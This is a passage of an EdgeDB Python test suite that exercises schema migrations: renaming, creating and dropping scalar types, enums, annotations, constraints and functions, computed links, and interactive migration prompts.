await self.con.execute('''
START MIGRATION TO {
module test {
scalar type ScalarType01 extending int64;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER SCALAR TYPE test::ScalarType1'
' RENAME TO test::ScalarType01;'
)
}],
'prompt': (
"did you rename scalar type 'test::ScalarType1' to "
"'test::ScalarType01'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT <test::ScalarType01>'2' + 1;
''', [3])
async def test_edgeql_migration_describe_scalar_02(self):
# Migration that creates a type.
await self.con.execute('''
START MIGRATION TO {
module test {
scalar type ScalarType02 extending str;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE SCALAR TYPE test::ScalarType02'
' EXTENDING std::str;'
)
}],
'prompt': "did you create scalar type 'test::ScalarType02'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT <test::ScalarType02>1 ++ '2';
''', ['12'])
# Migration that drops a type.
await self.con.execute('''
START MIGRATION TO {
module test {
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'DROP SCALAR TYPE test::ScalarType02;'
)
}],
'prompt': (
"did you drop scalar type 'test::ScalarType02'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
WITH MODULE schema
SELECT ScalarType
FILTER .name = 'test::ScalarType02';
''', [])
        # Make sure that the type was dropped cleanly by re-creating
        # and using the type again.
await self.con.execute('''
START MIGRATION TO {
module test {
scalar type ScalarType02 extending str;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE SCALAR TYPE test::ScalarType02'
' EXTENDING std::str;'
)
}],
'prompt': "did you create scalar type 'test::ScalarType02'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT <test::ScalarType02>2 ++ '1';
''', ['21'])
async def test_edgeql_migration_describe_enum_01(self):
# Migration that renames an enum.
await self.con.execute('''
START MIGRATION TO {
module test {
scalar type EnumType1 extending enum<foo, bar>;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
"CREATE SCALAR TYPE test::EnumType1"
" EXTENDING enum<foo, bar>;"
)
}],
'prompt': "did you create scalar type 'test::EnumType1'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT <test::EnumType1>'bar';
''', ['bar'])
await self.con.execute('''
START MIGRATION TO {
module test {
scalar type EnumType01 extending enum<foo, bar>;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER SCALAR TYPE test::EnumType1'
' RENAME TO test::EnumType01;'
)
}],
'prompt': (
"did you rename scalar type 'test::EnumType1' to "
"'test::EnumType01'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT <test::EnumType01>'foo';
''', ['foo'])
async def test_edgeql_migration_describe_enum_02(self):
# Migration that creates an enum.
await self.con.execute('''
START MIGRATION TO {
module test {
scalar type EnumType02 extending enum<foo, bar>;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
"CREATE SCALAR TYPE test::EnumType02"
" EXTENDING enum<foo, bar>;"
)
}],
'prompt': "did you create scalar type 'test::EnumType02'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT <test::EnumType02>'bar';
''', ['bar'])
# Migration that drops an enum.
await self.con.execute('''
START MIGRATION TO {
module test {
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'DROP SCALAR TYPE test::EnumType02;'
)
}],
'prompt': (
"did you drop scalar type 'test::EnumType02'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
WITH MODULE schema
SELECT ScalarType
FILTER .name = 'test::EnumType02';
''', [])
        # Make sure that the enum was dropped cleanly by re-creating
        # and using the enum again.
await self.con.execute('''
START MIGRATION TO {
module test {
scalar type EnumType02 extending enum<foo, bar>;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
"CREATE SCALAR TYPE test::EnumType02"
" EXTENDING enum<foo, bar>;"
)
}],
'prompt': "did you create scalar type 'test::EnumType02'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT <test::EnumType02>'foo';
''', ['foo'])
async def test_edgeql_migration_describe_annotation_01(self):
# Migration that renames an annotation.
await self.migrate('''
abstract annotation my_anno1;
''')
await self.con.execute('''
START MIGRATION TO {
module test {
abstract annotation renamed_anno1;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER ABSTRACT ANNOTATION test::my_anno1 '
'RENAME TO test::renamed_anno1;'
)
}],
},
})
async def test_edgeql_migration_describe_annotation_02(self):
# Migration that creates an annotation.
await self.con.execute('''
START MIGRATION TO {
module test {
abstract annotation my_anno2;
type AnnoType2 {
annotation my_anno2 := 'test_my_anno2';
}
};
};
''')
await self.con.execute('''
CREATE TYPE test::AnnoType2;
''')
await self.assert_describe_migration({
'confirmed': [
'CREATE TYPE test::AnnoType2;'
],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE ABSTRACT ANNOTATION test::my_anno2;'
)
}],
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
# Migration that drops an annotation.
await self.con.execute('''
START MIGRATION TO {
module test {
type AnnoType2;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER TYPE test::AnnoType2 {\n'
' DROP ANNOTATION test::my_anno2;\n'
'};'
)
}],
},
})
        # Apply the proposed statement manually instead of auto-completing.
await self.con.execute('''
ALTER TYPE test::AnnoType2 {
DROP ANNOTATION test::my_anno2;
};
''')
await self.assert_describe_migration({
'complete': False,
'proposed': {
'statements': [{
'text': (
'DROP ABSTRACT ANNOTATION test::my_anno2;'
)
}],
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
        # Make sure that the annotation was dropped cleanly by re-creating
        # and using the annotation again.
await self.con.execute('''
START MIGRATION TO {
module test {
abstract annotation my_anno2;
type AnnoType2 {
annotation my_anno2 := 'retest_my_anno2';
}
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE ABSTRACT ANNOTATION test::my_anno2;'
)
}],
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value,
},
} FILTER .name = 'test::AnnoType2';
""",
[{
'name': 'test::AnnoType2',
'annotations': [{
'name': 'test::my_anno2',
'@value': 'retest_my_anno2',
}]
}],
)
async def test_edgeql_migration_describe_constraint_01(self):
# Migration that renames a constraint.
await self.migrate('''
abstract constraint my_oneof(one_of: array<anytype>) {
using (contains(one_of, __subject__));
};
type Foo {
property note -> str {
constraint my_oneof(["foo", "bar"]);
}
}
''')
await self.con.execute('''
START MIGRATION TO {
module test {
abstract constraint my_one_of(one_of: array<anytype>) {
using (contains(one_of, __subject__));
};
type Foo {
property note -> str {
constraint my_one_of(["foo", "bar"]);
}
}
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER ABSTRACT CONSTRAINT test::my_oneof '
'RENAME TO test::my_one_of;'
)
}],
},
})
await self.fast_forward_describe_migration()
async def test_edgeql_migration_describe_constraint_02(self):
# Migration that renames a link constraint.
# Honestly I'm not sure if link constraints can really be
# anything other than exclusive?
await self.migrate('''
abstract constraint my_exclusive() extending std::exclusive;
type Foo;
type Bar {
link foo -> Foo {
constraint my_exclusive;
}
}
''')
await self.con.execute('''
START MIGRATION TO {
module test {
abstract constraint myexclusive() extending std::exclusive;
type Foo;
type Bar {
link foo -> Foo {
constraint myexclusive;
}
}
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER ABSTRACT CONSTRAINT test::my_exclusive '
'RENAME TO test::myexclusive;'
)
}],
},
})
await self.fast_forward_describe_migration()
async def test_edgeql_migration_describe_constraint_03(self):
        # Migration that renames an object constraint.
await self.migrate('''
abstract constraint my_oneof(one_of: array<anytype>) {
using (contains(one_of, __subject__));
};
type Foo {
property a -> str;
property b -> str;
constraint my_oneof(["foo", "bar"])
ON (__subject__.a++__subject__.b);
}
''')
await self.con.execute('''
START MIGRATION TO {
module test {
abstract constraint my_one_of(one_of: array<anytype>) {
using (contains(one_of, __subject__));
};
type Foo {
property a -> str;
property b -> str;
constraint my_one_of(["foo", "bar"])
ON (__subject__.a++__subject__.b);
}
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER ABSTRACT CONSTRAINT test::my_oneof '
'RENAME TO test::my_one_of;'
)
}],
},
})
await self.fast_forward_describe_migration()
async def test_edgeql_migration_describe_constraint_04(self):
# Migration that creates a constraint.
await self.con.execute('''
START MIGRATION TO {
module test {
abstract constraint my_one_of(one_of: array<anytype>) {
using (contains(one_of, __subject__));
};
scalar type my_str extending str {
constraint my_one_of(['my', 'str']);
};
};
};
''')
await self.con.execute('''
CREATE SCALAR TYPE test::my_str EXTENDING std::str;
''')
await self.assert_describe_migration({
'confirmed': [
'CREATE SCALAR TYPE test::my_str EXTENDING std::str;'
],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE ABSTRACT CONSTRAINT test::my_one_of('
'one_of: array<anytype>) {\n'
' USING (std::contains(one_of, __subject__));\n'
'};'
),
}],
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
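        # Use a savepoint so the expected constraint violation below can be
        # rolled back without losing the applied migration.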
await self.con.query('DECLARE SAVEPOINT migration_01')
await self.assert_query_result(
r"""
SELECT <test::my_str>'my';
""",
['my'],
)
with self.assertRaisesRegex(
edgedb.ConstraintViolationError,
r"invalid my_str"):
await self.con.execute(r"""
SELECT <test::my_str>'nope';
""")
await self.con.query('ROLLBACK TO SAVEPOINT migration_01')
# Migration that drops a constraint.
await self.con.execute('''
START MIGRATION TO {
module test {
scalar type my_str extending str;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
"ALTER SCALAR TYPE test::my_str {\n"
" DROP CONSTRAINT test::my_one_of(['my', 'str']);\n"
"};"
),
}],
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result(
r"""
SELECT <test::my_str>'my';
""",
['my'],
)
await self.assert_query_result(
r"""
SELECT <test::my_str>'nope';
""",
['nope'],
)
        # Test that dropping the constraint was clean by running a
        # migration that re-creates the constraint.
await self.con.execute('''
START MIGRATION TO {
module test {
abstract constraint my_one_of(one_of: array<anytype>) {
using (contains(one_of, __subject__));
};
scalar type my_str extending str {
constraint my_one_of(['my2', 'str2']);
};
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE ABSTRACT CONSTRAINT '
'test::my_one_of(one_of: array<anytype>) {\n'
' USING (std::contains(one_of, __subject__));\n'
'};'
),
}],
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result(
r"""
SELECT <test::my_str>'my2';
""",
['my2'],
)
with self.assertRaisesRegex(
edgedb.ConstraintViolationError,
r"invalid my_str"):
await self.con.execute(r"""
SELECT <test::my_str>'my';
""")
async def test_edgeql_migration_describe_abs_ptr_01(self):
await self.migrate('''
abstract link abs_link;
''')
await self.con.execute('''
START MIGRATION TO {
module test {
abstract link new_abs_link;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER ABSTRACT LINK test::abs_link '
'RENAME TO test::new_abs_link;'
)
}],
},
})
async def test_edgeql_migration_describe_function_01(self):
await self.migrate('''
function foo(x: str) -> str using (SELECT <str>random());
''')
await self.con.execute('''
START MIGRATION TO {
module test {
function bar(x: str) -> str using (SELECT <str>random());
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER FUNCTION test::foo(x: std::str) '
'{RENAME TO test::bar;};'
)
}],
},
})
async def test_edgeql_migration_function_01(self):
await self.migrate('''
type Note {
required property name -> str;
}
function hello_note(x: Note) -> str {
USING (SELECT x.name)
}
''')
async def test_edgeql_migration_function_02(self):
await self.migrate('''
type Foo;
function foo(x: Foo) -> int64 {
USING (SELECT 0)
}
''')
await self.migrate('''
type Bar;
function foo(x: Bar) -> int64 {
USING (SELECT 0)
}
''')
await self.con.execute('''
DROP FUNCTION test::foo(x: test::Bar);
''')
async def test_edgeql_migration_function_03(self):
await self.migrate('''
type Foo;
function foo(x: Foo) -> int64 {
USING (SELECT 0)
}
''')
await self.migrate('''
type Bar;
function foo2(x: Bar) -> int64 {
USING (SELECT 0)
}
''')
await self.con.execute('''
DROP FUNCTION test::foo2(x: test::Bar);
''')
async def test_edgeql_migration_function_04(self):
await self.migrate('''
function foo() -> str USING ('foo');
''')
await self.start_migration('''
function foo() -> str USING ('bar');
''')
await self.interact([
"did you alter function 'test::foo'?"
])
await self.fast_forward_describe_migration()
await self.assert_query_result(
r"""
SELECT test::foo()
""",
["bar"],
)
async def test_edgeql_migration_function_05(self):
await self.migrate("""
type Person {
required property name -> str {
constraint exclusive;
}
multi link places_visited -> Place;
}
type Place {
required property name -> str {
constraint exclusive;
}
}
function visited(person: str, city: str) -> bool
using (
WITH person := (SELECT Person FILTER .name = person),
SELECT city IN person.places_visited.name
);
""")
async def test_edgeql_migration_constraint_01(self):
await self.migrate('''
abstract constraint not_bad {
using (__subject__ != "bad" and __subject__ != "terrible")
}
type Foo {
property foo -> str {
constraint not_bad;
}
}
type Bar extending Foo;
''')
await self.start_migration('''
abstract constraint not_bad {
using (__subject__ != "bad" and __subject__ != "awful")
}
type Foo {
property foo -> str {
constraint not_bad;
}
}
type Bar extending Foo;
''')
await self.interact([
"did you alter abstract constraint 'test::not_bad'?"
])
await self.fast_forward_describe_migration()
async with self.assertRaisesRegexTx(
edgedb.ConstraintViolationError,
"invalid foo",
):
await self.con.execute(r"""
INSERT test::Foo { foo := "awful" };
""")
async def test_edgeql_migration_describe_type_rename_01(self):
await self.migrate('''
type Foo;
type Baz {
link l -> Foo;
};
''')
await self.con.execute('''
START MIGRATION TO {
module test {
type Bar;
type Baz {
link l -> Bar;
};
}
};
POPULATE MIGRATION;
''')
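        # POPULATE MIGRATION accepts every proposed statement, so the rename
        # should already appear as confirmed and the migration as complete.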
await self.assert_describe_migration({
'complete': True,
'confirmed': [
'ALTER TYPE test::Foo RENAME TO test::Bar;'
],
})
await self.fast_forward_describe_migration()
async def test_edgeql_migration_computed_01(self):
await self.migrate(r'''
type Foo {
property val -> str;
property comp := count((
                    # Use an alias in a WITH block in a computable
WITH x := .val
                    # Use an alias in a SELECT in a computable
SELECT y := Bar FILTER x = y.val
))
}
type Bar {
property val -> str;
}
''')
await self.con.execute("""
SET MODULE test;
INSERT Foo {val := 'c'};
INSERT Foo {val := 'd'};
INSERT Bar {val := 'a'};
INSERT Bar {val := 'b'};
INSERT Bar {val := 'c'};
INSERT Bar {val := 'c'};
""")
await self.assert_query_result(
r"""
SELECT Foo {
val,
comp,
} ORDER BY .val;
""",
[{
'val': 'c',
'comp': 2,
}, {
'val': 'd',
'comp': 0,
}],
)
async def test_edgeql_migration_computed_02(self):
await self.migrate(r'''
type Foo { property foo := '1' };
type Bar extending Foo;
''')
await self.migrate(r'''
type Foo { property foo := 1 };
type Bar extending Foo;
''')
async def test_edgeql_migration_computed_03(self):
await self.migrate(r'''
type User {
property name -> str;
multi link tweets := Tweet;
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
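        # Note: `tweets := Tweet` is an unfiltered computed link, so every
        # User ends up linked to every Tweet.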
await self.con.execute("""
INSERT Tweet {
text := 'Hello',
author := (
INSERT User {name := 'Alice'}
)
};
INSERT Tweet {
text := 'Hi',
author := (
INSERT User {name := 'Billie'}
)
};
""")
# Validate our structures
await self.assert_query_result(
r"""
SELECT Tweet {
text,
author: {
name
},
} ORDER BY .text;
""",
[{
'text': 'Hello',
'author': {
'name': 'Alice'
},
}, {
'text': 'Hi',
'author': {
'name': 'Billie'
},
}],
)
await self.assert_query_result(
r"""
SELECT User {
name,
tweets: {
text
} ORDER BY .text,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': [{
'text': 'Hello'
}, {
'text': 'Hi'
}],
}, {
'name': 'Billie',
'tweets': [{
'text': 'Hello'
}, {
'text': 'Hi'
}],
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi link tweets := User.<author[IS Tweet];
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets: {
text
} ORDER BY .text,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': [{
'text': 'Hello'
}],
}, {
'name': 'Billie',
'tweets': [{
'text': 'Hi'
}],
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi link tweets := .<author[IS Tweet];
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets: {
text
} ORDER BY .text,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': [{
'text': 'Hello'
}],
}, {
'name': 'Billie',
'tweets': [{
'text': 'Hi'
}],
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi link tweets := (
SELECT Tweet FILTER .author = User
);
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets: {
text
} ORDER BY .text,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': [{
'text': 'Hello'
}],
}, {
'name': 'Billie',
'tweets': [{
'text': 'Hi'
}],
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi link tweets := (
WITH U := User
SELECT Tweet FILTER .author = U
);
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets: {
text
} ORDER BY .text,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': [{
'text': 'Hello'
}],
}, {
'name': 'Billie',
'tweets': [{
'text': 'Hi'
}],
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi link tweets := (
WITH U := DETACHED User
SELECT Tweet FILTER .author = U
);
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
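        # With DETACHED User the filter no longer correlates with the outer
        # User, so every user again sees all tweets.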
await self.assert_query_result(
r"""
SELECT User {
name,
tweets: {
text
} ORDER BY .text,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': [{
'text': 'Hello'
}, {
'text': 'Hi'
}],
}, {
'name': 'Billie',
'tweets': [{
'text': 'Hello'
}, {
'text': 'Hi'
}],
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi link tweets := (
WITH U := User
SELECT U.<author[IS Tweet]
);
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets: {
text
} ORDER BY .text,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': [{
'text': 'Hello'
}],
}, {
'name': 'Billie',
'tweets': [{
'text': 'Hi'
}],
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi link tweets := (
WITH User := DETACHED User
SELECT User.<author[IS Tweet]
);
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets: {
text
} ORDER BY .text,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': [{
'text': 'Hello'
}, {
'text': 'Hi'
}],
}, {
'name': 'Billie',
'tweets': [{
'text': 'Hello'
}, {
'text': 'Hi'
}],
}],
)
async def test_edgeql_migration_computed_04(self):
await self.migrate(r'''
type User {
property name -> str;
multi property tweets := Tweet.text;
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.con.execute("""
INSERT Tweet {
text := 'Hello',
author := (
INSERT User {name := 'Alice'}
)
};
INSERT Tweet {
text := 'Hi',
author := (
INSERT User {name := 'Billie'}
)
};
""")
# Validate our structures
await self.assert_query_result(
r"""
SELECT Tweet {
text,
author: {
name
},
} ORDER BY .text;
""",
[{
'text': 'Hello',
'author': {
'name': 'Alice'
},
}, {
'text': 'Hi',
'author': {
'name': 'Billie'
},
}],
)
await self.assert_query_result(
r"""
SELECT User {
name,
tweets,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': {'Hello', 'Hi'},
}, {
'name': 'Billie',
'tweets': {'Hello', 'Hi'},
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi property tweets := User.<author[IS Tweet].text;
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': {'Hello'},
}, {
'name': 'Billie',
'tweets': {'Hi'},
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi property tweets := .<author[IS Tweet].text;
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': {'Hello'},
}, {
'name': 'Billie',
'tweets': {'Hi'},
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi property tweets := (
SELECT Tweet FILTER .author = User
).text;
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': {'Hello'},
}, {
'name': 'Billie',
'tweets': {'Hi'},
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi property tweets := (
WITH U := User
SELECT Tweet FILTER .author = U
).text;
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': {'Hello'},
}, {
'name': 'Billie',
'tweets': {'Hi'},
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi property tweets := (
WITH U := DETACHED User
SELECT Tweet FILTER .author = U
).text;
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
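        # As with links, DETACHED breaks the correlation, so both users see
        # all tweet texts.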
await self.assert_query_result(
r"""
SELECT User {
name,
tweets,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': {'Hello', 'Hi'},
}, {
'name': 'Billie',
'tweets': {'Hello', 'Hi'},
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi property tweets := (
WITH U := User
SELECT U.<author[IS Tweet].text
);
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': {'Hello'},
}, {
'name': 'Billie',
'tweets': {'Hi'},
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi property tweets := (
WITH User := DETACHED User
SELECT User.<author[IS Tweet].text
);
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': {'Hello', 'Hi'},
}, {
'name': 'Billie',
'tweets': {'Hello', 'Hi'},
}],
)
async def test_edgeql_migration_computed_05(self):
await self.migrate(r'''
type Bar {
multi link foo := Foo;
property name -> str;
};
type Foo {
link bar -> Bar;
property val -> str;
};
''', module='default')
await self.con.execute("""
INSERT Foo {
val := 'foo0',
bar := (
INSERT Bar {name := 'bar0'}
),
};
INSERT Foo {
val := 'foo1',
bar := (
INSERT Bar {name := 'bar1'}
),
};
""")
await self.assert_query_result(
r"""
SELECT Foo {
val,
bar: {
name,
foo: {
val
} ORDER BY .val,
},
} ORDER BY .val;
""",
[{
'val': 'foo0',
'bar': {
'name': 'bar0',
'foo': [{'val': 'foo0'}, {'val': 'foo1'}],
},
}, {
'val': 'foo1',
'bar': {
'name': 'bar1',
'foo': [{'val': 'foo0'}, {'val': 'foo1'}],
},
}],
)
async def test_edgeql_migration_computed_06(self):
await self.migrate(r'''
type Bar {
multi property foo := Foo.val;
property name -> str;
};
type Foo {
link bar -> Bar;
property val -> str;
};
''', module='default')
await self.con.execute("""
INSERT Foo {
val := 'foo0',
bar := (
INSERT Bar {name := 'bar0'}
),
};
INSERT Foo {
val := 'foo1',
bar := (
INSERT Bar {name := 'bar1'}
),
};
""")
await self.assert_query_result(
r"""
SELECT Foo {
val,
bar: {
name,
foo,
},
} ORDER BY .val;
""",
[{
'val': 'foo0',
'bar': {
'name': 'bar0',
'foo': {'foo0', 'foo1'},
},
}, {
'val': 'foo1',
'bar': {
'name': 'bar1',
'foo': {'foo0', 'foo1'},
},
}],
)
async def test_edgeql_migration_reject_prop_01(self):
await self.migrate('''
type User {
property foo -> str;
};
''')
await self.start_migration('''
type User {
property bar -> str;
};
''')
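        # interact() walks through the proposed prompts; answering "n"
        # rejects the rename so the server proposes altering the type
        # instead.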
await self.interact([
("did you rename property 'foo' of object type "
"'test::User' to 'bar'?", "n"),
# XXX: or should this be split up?
"did you alter object type 'test::User'?"
])
await self.fast_forward_describe_migration()
async def test_edgeql_migration_reject_prop_02(self):
await self.migrate('''
type User {
required property foo -> str;
};
''')
await self.start_migration('''
type User {
property bar -> str;
};
''')
# Initial confidence should *not* be 1.0 here
res = json.loads(await self.con.query_single(
'DESCRIBE CURRENT MIGRATION AS JSON;'))
self.assertLess(res['proposed']['confidence'], 1.0)
await self.interact([
("did you rename property 'foo' of object type 'test::User' to "
"'bar'?", "n"),
# XXX: or should this be split up?
"did you alter object type 'test::User'?"
])
await self.fast_forward_describe_migration()
async def test_edgeql_migration_reject_prop_03(self):
await self.migrate('''
type User {
required property foo -> str;
};
''')
await self.start_migration('''
type User {
required property bar -> int64;
};
''')
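        # The third element of the last tuple below is the conversion
        # expression supplied when confirming the property type change.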
await self.interact([
# Or should this be split into rename and reset optionality?
("did you create property 'bar' of object type 'test::User'?",
"n"),
("did you rename property 'foo' of object type 'test::User' to "
"'bar'?"),
("did you alter the type of property 'bar' of object type "
"'test::User'?",
"y",
"<int64>.bar"),
])
await self.fast_forward_describe_migration()
async def test_edgeql_migration_reject_prop_04(self):
await self.migrate('''
type Foo;
type Bar;
''')
await self.start_migration('''
type Foo;
type Bar extending Foo;
''')
await self.interact([
("did you alter object type 'test::Bar'?", "n"),
"did you drop object type 'test::Bar'?",
"did you create object type 'test::Bar'?",
])
await self.fast_forward_describe_migration()
@test.xfail('Fails to rebase because the type is mismatched')
async def test_edgeql_migration_reject_prop_05(self):
await self.migrate('''
scalar type Slug extending str;
abstract type Named {
required property name -> Slug;
};
type User {
required property name -> str;
};
''')
await self.start_migration('''
scalar type Slug extending str;
abstract type Named {
required property name -> Slug;
};
type User extending Named;
''')
await self.interact([
("did you drop property 'name' of object type 'test::User'?", "n"),
], check_complete=False)
await self.fast_forward_describe_migration()
async def test_edgeql_migration_force_delete_01(self):
await self.migrate('''
type Base;
type Foo;
type Bar { link foo -> Foo; };
''')
await self.start_migration('''
type Base;
type Foo extending Base;
type Bar { link foo -> Foo; };
''')
await self.interact([
("did you alter object type 'test::Foo'?", "n"),
"did you drop link 'foo' of object type 'test::Bar'?"
], check_complete=False)
await self.fast_forward_describe_migration()
async def test_edgeql_migration_force_delete_02(self):
await self.migrate('''
type Base;
type Foo;
type Bar extending Foo;
''')
await self.start_migration('''
type Base;
type Foo extending Base;
type Bar extending Foo;
''')
await self.interact([
("did you alter object type 'test::Foo'?", "n"),
"did you drop object type 'test::Bar'?"
], check_complete=False)
await self.fast_forward_describe_migration()
async def test_edgeql_migration_eq_01(self):
await self.migrate("""
type Base;
""")
await self.con.execute("""
SET MODULE test;
INSERT Base;
""")
# Try altering the schema to a state inconsistent with current
# data.
with self.assertRaisesRegex(
AssertionError,
r"Please specify an expression to populate existing objects "
r"in order to make property 'name' of object type 'test::Base' "
r"required"
):
await self.migrate("""
type Base {
required property name -> str;
}
""")
# Migration without making the property required.
await self.migrate("""
type Base {
property name -> str;
}
""")
await self.assert_query_result(
r"""
SELECT Base {
name
};
""",
[{
'name': None,
}],
)
await self.con.execute("""
UPDATE
Base
SET {
name := 'base_01'
};
""")
await self.assert_query_result(
r"""
SELECT Base {
name
};
""",
[{
'name': 'base_01',
}],
)
# Inherit from the Base, making name required.
await self.migrate("""
type Base {
property name -> str;
}
type Derived extending Base {
overloaded required property name -> str;
}
""")
await self.con.execute("""
INSERT Derived {
name := 'derived_01'
};
""")
await self.assert_query_result(
r"""
SELECT Base.name;
""",
{'base_01', 'derived_01'},
)
async def test_edgeql_migration_eq_02(self):
await self.migrate(r"""
type Base {
property foo -> str;
}
type Derived extending Base {
overloaded required property foo -> str;
}
""")
await self.con.execute("""
SET MODULE test;
INSERT Base {
foo := 'base_02',
};
INSERT Derived {
foo := 'derived_02',
};
""")
await self.migrate(r"""
type Base {
# rename 'foo'
property foo2 -> str;
}
type Derived extending Base {
overloaded required property foo2 -> str;
}
""")
# the data still persists
await self.assert_query_result(
r"""
SELECT Base {
__type__: {name},
foo2,
} ORDER BY .foo2;
""",
[{
'__type__': {'name': 'test::Base'},
'foo2': 'base_02',
}, {
